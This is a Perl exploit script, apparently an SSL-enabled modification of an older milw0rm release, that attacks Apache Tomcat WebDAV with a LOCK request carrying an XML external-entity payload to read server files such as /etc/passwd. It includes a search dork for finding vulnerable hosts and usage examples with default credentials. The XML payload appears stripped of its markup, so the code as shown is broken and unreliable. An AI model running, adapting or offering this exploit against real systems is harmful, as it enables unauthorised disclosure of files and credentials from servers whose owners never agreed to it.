#!/usr/bin/perl #================================================================ # Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL # MoDiFiEd version by : h3rcul3s # ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530 # MoDiFiCaTiOn : This code is useble against targets over SSL # Prerequisites : A valid login credentials, webdav # DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat # Potential targets : similar to https://www.somehost.com:8443 #================================================================ # THaNkS To eliteb0y, the whole team AnD "perlmonks". # This piece of code is written ONLY for educational purpose. # Use it at your own risk. # No author will be responsible for any damage. #================================================================ # -------------------------[C O D E]----------------------------- #================================================================ use LWP::Protocol::https; use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE-------------------------------------------- $remoteport = 8443; sub usage { print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "\n\n"; print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n"; print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n"; print "\n\n"; print "USAGE :\nperl TOMCATXPL-SSL [username] [password] [https]\n"; print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "\n" ."\n" ."]>\n" ."\n" ."\n" ."\n" ."\n" ."\n" ."\n" ."&RemoteX;\n" ."\n" ."\n" ."\n" ."\n"; print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n"; print "\n"; print "Launching Remote Exploit over SSL...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; }